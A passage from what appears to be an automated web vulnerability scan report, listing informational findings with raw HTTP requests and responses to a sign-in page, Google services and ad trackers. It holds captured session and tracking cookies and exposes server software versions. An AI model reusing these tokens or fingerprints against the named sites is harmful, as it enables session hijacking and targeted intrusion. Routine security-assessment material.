Path:   /signin

Request

POST /signin HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: http://trafficshaping.com/
Cache-Control: max-age=0
Origin: http://trafficshaping.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-3; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334
Content-Length: 29

email=&password=&action=login

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:42:43 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:42:42 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 4701

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>TrafficShaping - Sign into Your Account</title>
<meta name="description" conten
...[SNIP]...

7.253. http://clients1.google.com/webpagethumbnail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /webpagethumbnail

Request

GET /webpagethumbnail?c=11&r=2&f=2&s=300:585&query=url+shortening+domain&hl=en&gl=us&d=http%3A%2F%2Fwebapps.stackexchange.com%2Fquestions%2F11750%2Fwhere-are-the-shrinkster-short-url-codes-now&b=1&j=google.vs.r&a=5nQ HTTP/1.1
Host: clients1.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=url+shortening+domain
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; __utmx=173272373.; __utmxx=173272373.; S=static_files=8yY1lAZwM4I; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298824247:GM=1:SG=1:S=POvRNEJGePf-rmlH

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Expires: Sun, 27 Feb 2011 16:31:00 GMT
Cache-Control: private, max-age=86400
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298824260:GM=1:SG=1:S=61_NDXVnBKSXN-RI; expires=Tue, 26-Feb-2013 16:31:00 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sun, 27 Feb 2011 16:31:00 GMT
Server: snapshot_btfe
X-XSS-Protection: 1; mode=block
Content-Length: 26754

google.vs.r({"s":"b","b":1,"dim":[302,585],"ssegs":["data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAA0JCgsKCA0LCgsODg0PEyAVExISEyccHhcgLikxMC4pLSwzOko+MzZGNywtQFdBRkxOUlNSMj5aYVpQYEpRUk//2wBD
...[SNIP]...

7.254. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:10:51 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=8140aa640cca785f:TM=1298761851:LM=1298761851:S=02MBDa_YOPPl2aV7; expires=Mon, 25-Feb-2013 23:10:51 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

7.255. http://companypond.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://companypond.com
Path:   /

Request

GET / HTTP/1.1
Host: companypond.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=a2c7a54278c433ffb161bcded3a69224; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...

7.256. https://competencycenter.oracle.com/opncc/home.cc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://competencycenter.oracle.com
Path:   /opncc/home.cc

Request

GET /opncc/home.cc HTTP/1.1
Host: competencycenter.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Redirect to Oracle SSO Server
Date: Sat, 26 Feb 2011 23:28:15 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~BAC50DE4~DEC0AC5035CED6CC0B3F3594BC4D1E27D57801AB3B738C530FDEC9D4D6B89FCC65E71D9A32DBEA72EB49D45517FC06A0038803027A2EB1F71F509321B26238DA31AB2107650522836D05D24AC18AF3D2CE74723E6DB6B8D2A98D510870A93F646A70A27A49006816F2151437FE2E357EE687EE46D5946A9589F7C1FE5DA5B9A9D0AADDCC6946F44E1734119286A68CC84612BBD722EBFF757FA58CB9A5F6766A8047A04BCCF2CC9A6DD638225287A7EFCE6E159C5622F745C11661E0AC6D78DCA4F910FCE7B9D1EF58524C1956B0878E
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServeropncc_pool=1762562701.20480.0000; expires=Sun, 27-Feb-2011 07:28:15 GMT; path=/
Content-Length: 984

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Redirect to Oracle SSO Server</TITLE>
</HEAD><BODY>
<H1>Redirect to Oracle SSO Server</H1>
The document has moved <A HREF="ht
...[SNIP]...

7.257. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.capgemini.com%2fmy-capgemini%2f HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lgoi030zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=015020a0e0f0g1lgoi03xzt1b4ssxzt1ka3cxzt1ka3cxzt1b4ss; clid=2lgoi03011706pgp44i37uxw0ltm500d1m010a0120d; orblb=2lgpp5n012d410u0100000; rdrlst=4091196lh8s3k000000041m011195lhabm8000000011m011194lh8s3o000000031m0110rdlh8s3f000000051m010ig1lgs3mp0000000b1m010mjelgzmsv000000081m0110telh1s3s000000071m011192lh8s3u000000021m010i75lgpp5n0000000c1m01; sglst=20x0s8kmlgzmsv000000081m010a01208ag2lh1s3s08jig0071m010a012079zdlgzmsv000000081m010a01208bnxlgzmsv000000081m010a01208avklgzmsv000000081m010a01208b1algzmsv000000081m010a01208b0olgzmsv000000081m010a01208ab4lgzmsv000000081m010a012089brlgzmsv000000081m010a0120871jlgzmsv000000081m010a012087s3lgzmsv000000081m010a012088y9lgzmsv000000081m010a01208943lgzmsv000000081m010a012089krlgzmsv000000081m010a01208923lgzmsv000000081m010a012088ndlgzmsv000000081m010a01208ahmlgzmsv000000081m010a012083ualgzmsv000000081m010a0120878jlgpp5n0kmgl00c1m010a0120cb04lgzmsv000000081m010a01208bbhlgzmsv000000081m010a012080telgyxuj0bdrp00a1m010a0120abcxlgzmsv000000081m010a012084wnlgzmsv000000081m010a01208b09lgzmsv000000081m010a01208bhhlgzmsv000000081m010a01208a97lgzmsv000000081m010a01208acflgzmsv000000081m010a01208bhflgzmsv000000081m010a01208bqslgzmsv000000081m010a012088aelgzmsv000000081m010a01208bfalgzmsv000000081m010a012087pelgzmsv000000081m010a01208; vstcnt=3lgoi03020r024pjaa120i0b50l0b50k0b50j0b50i0b50h0b50g0b5050b5040b5030b5020b5000b4zz0b4zx0b4zw0b4zv0b4xt0b4xs0b4ss4qe7e12010ka3c1l054lb9312710ipx30ipx20ipx10ipx00ipwz0ipwy0ipwx0ipww0ipwv0ipwu0ipws0ipwr0ipwq0ipwp0ipwo0ipwn0ipwm0ipwl0ipwj0ipwi0ipwh0ipwg0ipwf0ipwe0ipwa0ipw90ipw80ipw70ipw60ipw40ipw30ipw20ipw10ipw00ipvz0ipvv0ipvt0ipvs0ipvr0ipvq0ipvp0ipvo0ipvn0ipvm0ipvl0ipvk0ipvj0ipvf0ipve0ipvd0ipvc0ipvb0ipva0ipv90ipv70ipv60ipv50ipv40ipv30ipv20ipv10ipv00ipuz0ipuy0ipux0ipuw0ipuv0ipuu0iput0ipur0ipuq0ipup0ipuo0ipun0ipuj0ipui0ipuh0ipug0ipuf0ipue0ipuc0ipub0ipua0ipu90ipu00iptz0ipty0iptw0iptq0iptp0iptm0iptl0iptk0iptj0ipth0iptg0iptf0ipte0ipt90ipt80ipt70ipt60ipt50ipt40ipt30ipt20ipt10ipsz0ipsy0ipsx0ipst0ipss0ipsr0ipsq0ipsp0ipso0ipsn0ipsl0ipsh0ipsg0ipsf0ipse0ipsd0ipsc0ipsb0ips90ips80ips70ips60ips50ips40ips30ips20ips10ipru0iprt0iprr0iprq0iprp0ipro0iprn0iprm0iprl0iprk0iprj0iprh0iprg0iprf0ipre0iprd0iprc0iprb0ipra0ipr90ipr80ipr70ipr60ipr50ipr40ipr30ipr20ipr10ipr00ipqz0ipqy0ipqx0ipqw0ipqv0ipqu0ipqs0ipqr0ipqq0ipqp0ipqo0ipqn0ipqm0ipql0ipqk0ipqj0ipqi0ipqe0ipqc0ipqb0ipqa0ipq90ipq80ipq70ipq60ipq50ipq40ipq30ipq20ipq00ippz0ippy0ippx0ippw0ippv0ippu0ipps0ippr0ippq0ippp0ippo0ippn0ippm0ippl0ippk0ippj0ippi0ipph0ippf0ippe0ippd0ippc0ippb0ippa0ipp90ipp80ipp40ipp30ipp10ipp00ipoz0ipoy0ipox0ipow0ipov0ipou0ipob0ipoa0ipo90ipo80ipo70ipo60ipo40ipo30ipo20ipo10ipny0ipnw0ipnv0ipnt0ipns0ipnq0ipno0ipnn0ipnm0ipni0ipnh0ipng0ipnd0ipkf4fa7a124003m5i03m5h03m5g03m5f03m5d03m5c03m5b03m5a03m5903m5803m5703m5303m5203m5003m4z03m4y03m4x03m4w03m4v03m4u03m4t03m4s03m4r03m4q03m4p03m4n03m4m03m4l03m4k03m4j03m4i03m4e03m4d03m4c03m4b03m4903m4803m4703m4603m4503m4403m4303m4203m4103m4003m3z03m3y03m3x03m3v03m3u03m3t03m3s03m3r03m3q03m3p03m3o03m3n03m3m03m3l03m3k03m3j03m3i03m3h03m3g03m3f03m3d03m3c03m3b03m3a03m3903m3803m3403m3203m3103m2w03m2v03m2q03m2p03m2o03m2n03m2m03m2l03m2k03m2i03m2h03m2a03m2903m2803m2303m2203m2103m2003m1z03m1y03m1x03m1w03m1r03m1q03m1p03m1o03m1n03m1m03m1l03m1k03m1j03m1i03m1d03m1c03m1b03m1703m1603m1503m1403m1203m1103m1003m0z03m0y03m0x03m0w03m0v03m0u03m0t03m0r03m0q03m0p03m0o03m0n03m0j03m0i03m0h03m0g03m0f03m0d03m0c03m0b03m0a03m0903m0803m0703m0603m0503lzs03lzr4ie5o124l0daac0daab0daaa0daa90daa80daa70daa60daa50daa30daa20daa10daa00da9z0da9y0da9x0da9w0da9v0da9u0da9t0da9s0da9r0da9q0da9o0da9n0da9m0da9i0da9h0da9g0da9b0da9a0da990da980da970da960da940da930da920da910da900da8z0da8y0da8x0da8w0da8v0da8u0da8s0da8r0da8q0da8d0da8c0da8b0da8a0da890da880da870da850da840da830da820da810da800da7z0da7y0da7x0da7w0da7n0da7m0da7l0da7c0da7b0da7a0da790da780da770da760da750da740da730da710da700da6z0da6y0da6x0da6w0da6u0da6t0da6s0da6r0da6q0da6p0da6o0da6m0da6l0da6k0da6j0da6i0da6h0da6g0da6f0da6e0da6c0da6b0da6a0da690da680da670da660da650da640da620da610da600da5w0da5v0da5u0da5t0da5s0da5r0da5q0da5p0da5o0da5n0da5m0da5l0da5k0da5j0da5i0da5h0da5g0da5f0da5e0da5d0da5b0da5a0da590da580da570da560da530da4m0da4l0da4k0da4j0da4i0da4g0da4f0da4d0da4c0da4b0da4a0da470da460da450da440da430da410da400da3z0da3y0da3x0da3v0da3u0da3t0da3q0da3p4gs8l12010ltm54null12010iptb

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=015020a0e0f0g1lgoi03xzt1b4ssxzt1nrmbxzt1ka3cxzt1b4ss; Domain=media6degrees.com; Expires=Sat, 27-Aug-2011 17:51:50 GMT; Path=/
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lgoi03011706pgp44i37uxw0nrmb00e1n010a0220e; Domain=media6degrees.com; Expires=Sat, 27-Aug-2011 17:51:50 GMT; Path=/
Set-Cookie: orblb=2lgpp5n012d410u0100000; Domain=media6degrees.com; Expires=Sat, 27-Aug-2011 17:51:50 GMT; Path=/
Set-Cookie: rdrlst=40a1196lh8s3k000000051n011195lhabm8000000021n011194lh8s3o000000041n0110rdlh8s3f000000061n010mjelgzmsv000000091n010ig1lgs3mp0000000c1n0110telh1s3s000000081n011193lhc9me000000011n011192lh8s3u000000031n010i75lgpp5n0000000d1n01; Domain=media6degrees.com; Expires=Sat, 27-Aug-2011 17:51:50 GMT; Path=/
Set-Cookie: sglst=20x0s8kmlgzmsv000000091n010a02209ag2lh1s3s0ahim0081n010a022089zdlgzmsv000000091n010a02209bnxlgzmsv000000091n010a02209avklgzmsv000000091n010a02209b1algzmsv000000091n010a0220971jlgzmsv000000091n010a022099brlgzmsv000000091n010a02209ab4lgzmsv000000091n010a02209b0olgzmsv000000091n010a022097s3lgzmsv000000091n010a022098y9lgzmsv000000091n010a02209943lgzmsv000000091n010a022099krlgzmsv000000091n010a02209923lgzmsv000000091n010a022098ndlgzmsv000000091n010a02209ahmlgzmsv000000091n010a022093ualgzmsv000000091n010a0220978jlgpp5n0mkgr00d1n010a0220db04lgzmsv000000091n010a02209bbhlgzmsv000000091n010a022090telgyxuj0dbrv00b1n010a0220bbcxlgzmsv000000091n010a022094wnlgzmsv000000091n010a02209b09lgzmsv000000091n010a02209bhhlgzmsv000000091n010a02209acflgzmsv000000091n010a02209a97lgzmsv000000091n010a02209bqslgzmsv000000091n010a02209bhflgzmsv000000091n010a022098aelgzmsv000000091n010a02209bfalgzmsv000000091n010a022097pelgzmsv000000091n010a02209; Domain=media6degrees.com; Expires=Sat, 27-Aug-2011 17:51:50 GMT; Path=/
Set-Cookie: vstcnt=3lgoi03020r024pjaa120i0b50l0b50k0b50j0b50i0b50h0b50g0b5050b5040b5030b5020b5000b4zz0b4zx0b4zw0b4zv0b4xt0b4xs0b4ss4qe7e12010ka3c1l064lb9312710ipx30ipx20ipx10ipx00ipwz0ipwy0ipwx0ipww0ipwv0ipwu0ipws0ipwr0ipwq0ipwp0ipwo0ipwn0ipwm0ipwl0ipwj0ipwi0ipwh0ipwg0ipwf0ipwe0ipwa0ipw90ipw80ipw70ipw60ipw40ipw30ipw20ipw10ipw00ipvz0ipvv0ipvt0ipvs0ipvr0ipvq0ipvp0ipvo0ipvn0ipvm0ipvl0ipvk0ipvj0ipvf0ipve0ipvd0ipvc0ipvb0ipva0ipv90ipv70ipv60ipv50ipv40ipv30ipv20ipv10ipv00ipuz0ipuy0ipux0ipuw0ipuv0ipuu0iput0ipur0ipuq0ipup0ipuo0ipun0ipuj0ipui0ipuh0ipug0ipuf0ipue0ipuc0ipub0ipua0ipu90ipu00iptz0ipty0iptw0iptq0iptp0iptm0iptl0iptk0iptj0ipth0iptg0iptf0ipte0ipt90ipt80ipt70ipt60ipt50ipt40ipt30ipt20ipt10ipsz0ipsy0ipsx0ipst0ipss0ipsr0ipsq0ipsp0ipso0ipsn0ipsl0ipsh0ipsg0ipsf0ipse0ipsd0ipsc0ipsb0ips90ips80ips70ips60ips50ips40ips30ips20ips10ipru0iprt0iprr0iprq0iprp0ipro0iprn0iprm0iprl0iprk0iprj0iprh0iprg0iprf0ipre0iprd0iprc0iprb0ipra0ipr90ipr80ipr70ipr60ipr50ipr40ipr30ipr20ipr10ipr00ipqz0ipqy0ipqx0ipqw0ipqv0ipqu0ipqs0ipqr0ipqq0ipqp0ipqo0ipqn0ipqm0ipql0ipqk0ipqj0ipqi0ipqe0ipqc0ipqb0ipqa0ipq90ipq80ipq70ipq60ipq50ipq40ipq30ipq20ipq00ippz0ippy0ippx0ippw0ippv0ippu0ipps0ippr0ippq0ippp0ippo0ippn0ippm0ippl0ippk0ippj0ippi0ipph0ippf0ippe0ippd0ippc0ippb0ippa0ipp90ipp80ipp40ipp30ipp10ipp00ipoz0ipoy0ipox0ipow0ipov0ipou0ipob0ipoa0ipo90ipo80ipo70ipo60ipo40ipo30ipo20ipo10ipny0ipnw0ipnv0ipnt0ipns0ipnq0ipno0ipnn0ipnm0ipni0ipnh0ipng0ipnd0ipkf4fa7a123x03m5i03m5h03m5g03m5f03m5d03m5c03m5b03m5a03m5903m5803m5703m5303m5203m5003m4z03m4y03m4x03m4w03m4v03m4u03m4t03m4s03m4r03m4q03m4p03m4n03m4m03m4l03m4k03m4j03m4i03m4e03m4d03m4c03m4b03m4903m4803m4703m4603m4503m4403m4303m4203m4103m4003m3z03m3y03m3x03m3v03m3u03m3t03m3s03m3r03m3q03m3p03m3o03m3n03m3m03m3l03m3k03m3j03m3i03m3h03m3g03m3f03m3d03m3c03m3b03m3a03m3903m3803m3403m3203m3103m2w03m2v03m2q03m2p03m2o03m2n03m2m03m2l03m2k03m2i03m2h03m2a03m2903m2803m2303m2203m2103m2003m1z03m1y03m1x03m1w03m1r03m1q03m1p03m1o03m1n03m1m03m1l03m1k03m1j03m1i03m1d03m1c03m1b03m1703m1603m1503m1403m1203m1103m1003m0z03m0y03m0x03m0w03m0v03m0u03m0t03m0r03m0q03m0p03m0o03m0n03m0j03m0i03m0h03m0g03m0f03m0d03m0c03m0b03m0a03m0903m0803m0703m064ie5o124l0daac0daab0daaa0daa90daa80daa70daa60daa50daa30daa20daa10daa00da9z0da9y0da9x0da9w0da9v0da9u0da9t0da9s0da9r0da9q0da9o0da9n0da9m0da9i0da9h0da9g0da9b0da9a0da990da980da970da960da940da930da920da910da900da8z0da8y0da8x0da8w0da8v0da8u0da8s0da8r0da8q0da8d0da8c0da8b0da8a0da890da880da870da850da840da830da820da810da800da7z0da7y0da7x0da7w0da7n0da7m0da7l0da7c0da7b0da7a0da790da780da770da760da750da740da730da710da700da6z0da6y0da6x0da6w0da6u0da6t0da6s0da6r0da6q0da6p0da6o0da6m0da6l0da6k0da6j0da6i0da6h0da6g0da6f0da6e0da6c0da6b0da6a0da690da680da670da660da650da640da620da610da600da5w0da5v0da5u0da5t0da5s0da5r0da5q0da5p0da5o0da5n0da5m0da5l0da5k0da5j0da5i0da5h0da5g0da5f0da5e0da5d0da5b0da5a0da590da580da570da560da530da4m0da4l0da4k0da4j0da4i0da4g0da4f0da4d0da4c0da4b0da4a0da470da460da450da440da430da410da400da3z0da3y0da3x0da3v0da3u0da3t0da3q0da3p4gs8l12010ltm54null12010iptb4ec6p12010nrmb; Domain=media6degrees.com; Expires=Sat, 27-Aug-2011 17:51:50 GMT; Path=/
Location: http://ads.adbrite.com/adserver/vdi/712156?d=6pgp44i37uxw
Content-Length: 0
Date: Mon, 28 Feb 2011 17:51:49 GMT


7.258. http://d.businessinsider.com/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.businessinsider.com
Path:   /ajs.php

Request

GET /ajs.php?zoneid=32&pagetype=post&vertical=sai&author=Pascal-Emmanuel+Gobry&cb=30085983266&charset=UTF-8&loc=http%3A//www.businessinsider.com/gabriel-weinberg-duckduckgo-2011-1&referer=http%3A//duckduckgo.com/spread.html HTTP/1.1
Host: d.businessinsider.com
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/gabriel-weinberg-duckduckgo-2011-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CIM=0; ke=1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:55:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=2dcd2e2a27002535bcbbdeec056868db; expires=Wed, 29-Feb-2012 01:55:27 GMT; path=/
Content-Length: 965
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_7486f028 = '';
OX_7486f028 += "<"+"a href=\'http://d.businessinsider.com/ck.php?oaparams=2__bannerid=948__zoneid=32__cb=b0daf08458__r_id=dbaec5a0c1230b368affafb5b4af499a__r_ts=lhcw0f__oadest=ht
...[SNIP]...

7.259. http://d.businessinsider.com/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.businessinsider.com
Path:   /lg.php

Request

GET /lg.php?bannerid=948&campaignid=674&zoneid=32&loc=http%3A%2F%2Fwww.businessinsider.com%2Fgabriel-weinberg-duckduckgo-2011-1&referer=http%3A%2F%2Fduckduckgo.com%2Fspread.html&cb=b0daf08458&r_id=dbaec5a0c1230b368affafb5b4af499a&r_ts=lhcw0f HTTP/1.1
Host: d.businessinsider.com
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/gabriel-weinberg-duckduckgo-2011-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CIM=0; ke=1; OAID=2dcd2e2a27002535bcbbdeec056868db

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:55:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=2dcd2e2a27002535bcbbdeec056868db; expires=Wed, 29-Feb-2012 01:55:28 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

7.260. http://davidwalsh.name/wp-content/plugins/wp-spamfree/js/wpsf-js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://davidwalsh.name
Path:   /wp-content/plugins/wp-spamfree/js/wpsf-js.php

Request

GET /wp-content/plugins/wp-spamfree/js/wpsf-js.php HTTP/1.1
Host: davidwalsh.name
Proxy-Connection: keep-alive
Referer: http://davidwalsh.name/google-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:31:37 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Set-Cookie: xpufDcujAfnqqnyu=omADygkvokjunfyw; path=/
Cache-Control: max-age=1, private, must-revalidate
Pragma: no-cache
Expires: Wed, 02 Mar 2011 04:31:37 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1526


// WP-SpamFree 2.1.1.2 JS Code :: BEGIN

// Cookie Handler :: BEGIN
function GetCookie( name ) {
   var start = document.cookie.indexOf( name + '=' );
   var len = start + name.length + 1;
   if
...[SNIP]...

7.261. http://ds.addthis.com/red/psi/sites/iwantmyname.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/iwantmyname.com/p.json

Request

GET /red/psi/sites/iwantmyname.com/p.json?callback=_ate.ad.hpr&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fiwantmyname.com%2Fservices%2Furl-shortener%2Fcloudapp-custom-domain&1jw94hd HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298679570.60|1297806627.66; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 281
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 27 Feb 2011 16:39:44 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 29 Mar 2011 16:39:44 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298824784.60|1297806627.66; Domain=.addthis.com; Expires=Tue, 26-Feb-2013 16:39:44 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 27 Feb 2011 16:39:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 27 Feb 2011 16:39:44 GMT
Connection: close

